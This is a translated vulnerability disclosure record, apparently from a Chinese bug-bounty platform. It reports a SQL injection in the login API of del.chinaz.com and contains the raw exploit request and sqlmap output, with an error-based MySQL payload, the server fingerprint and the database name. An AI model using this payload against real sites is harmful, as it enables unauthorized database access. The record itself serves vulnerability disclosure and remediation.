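2015-11-02: Details reported to the vendor; awaiting vendor handling
2015-11-03: Vendor confirmed; details disclosed to the vendor only
2015-11-13: Details disclosed to core white hats and experts in the relevant field
2015-11-23: Details disclosed to regular white hats
2015-12-03: Details disclosed to trainee white hats
2015-12-18: Details disclosed to the public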
POST /api-login.aspx HTTP/1.1
Content-Length: 86
Content-Type: application/x-www-form-urlencoded
Referer: http://del.chinaz.com
Cookie: searchhistory=1-%3fkw%3d1%26p%3d0%26bl%3d1%26el%3d1%26ds%255B%255D%3d2%26ds%255B%255D%3d1%26py%3d1%26pl%3d1%26cv%3d1%26vy%3d1%26ai%3d1%26hs%3d1%26sort%3d1%26suffix%255B%255D%3dcom%26dt%3d0%26date%3d2015%26pagesize%3d30; tabswitch=leftside; CNZZDATA5082706=cnzz_eid%3D1522931093-1444446673-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1444446673; CNZZDATA433095=cnzz_eid%3D1746983847-1444446394-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1444446394
Host: del.chinaz.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

login=&autologin=autologin&logintype=username&password=g00dPa%24%24w0rD&username=1%22)* -- 
Injection point: username. Note the format of this parameter: it contains a *.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: login=&autologin=autologin&logintype=username&password=g00dPa$$w0rD&username=1") AND (SELECT 1595 FROM(SELECT COUNT(*),CONCAT(0x717a6a7071,(SELECT (ELT(1595=1595,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) -- 
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: MySQL 5.0
Database: idc123
[108 tables]
Severity: Low
Vulnerability Rank: 3
Confirmed at: 2015-11-03 08:13
Blocking has been arranged. Thanks for the feedback.
None yet